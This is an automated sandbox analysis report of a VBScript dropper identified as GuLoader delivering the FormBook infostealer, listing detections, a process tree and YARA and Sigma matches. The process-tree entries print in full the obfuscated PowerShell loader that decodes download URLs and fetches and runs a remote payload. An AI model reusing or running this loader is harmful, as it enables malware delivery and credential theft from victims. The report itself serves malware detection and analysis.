Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6 654398.vbs

Overview

General Information

Sample name:6 654398.vbs
renamed because original name is a hash value
Original sample name: 654398.vbs
Analysis ID:1539343
MD5:2270731a281cd40f18f75b69a308207d
SHA1:b4d8bc01ca3ef042e7c4839edc21967bd735e1fc
SHA256:dbe9edac7d02e3a20e96ae4869966673cfa2505094c3ef06ca1250cffd097f5f
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3872 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 3688 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6656 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • GJFjqeGumqI.exe (PID: 616 cmdline: "C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 5636 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • GJFjqeGumqI.exe (PID: 2576 cmdline: "C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        Click to see the 18 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7156.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          amsi32_6656.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc436:$b2: ::FromBase64String(
          • 0xb4c2:$s1: -join
          • 0x4c6e:$s4: +=
          • 0x4d30:$s4: +=
          • 0x8f57:$s4: +=
          • 0xb074:$s4: +=
          • 0xb35e:$s4: +=
          • 0xb4a4:$s4: +=
          • 0x152b8:$s4: +=
          • 0x15338:$s4: +=
          • 0x153fe:$s4: +=
          • 0x1547e:$s4: +=
          • 0x15654:$s4: +=
          • 0x156d8:$s4: +=
          • 0xbce1:$e4: Get-WmiObject
          • 0xbed0:$e4: Get-Process
          • 0xbf28:$e4: Start-Process
          • 0x15f43:$e4: Get-Process

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", ProcessId: 3872, ProcessName: wscript.exe
          Sigma detected: Msiexec Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.103.62.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49988
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", ProcessId: 3872, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: 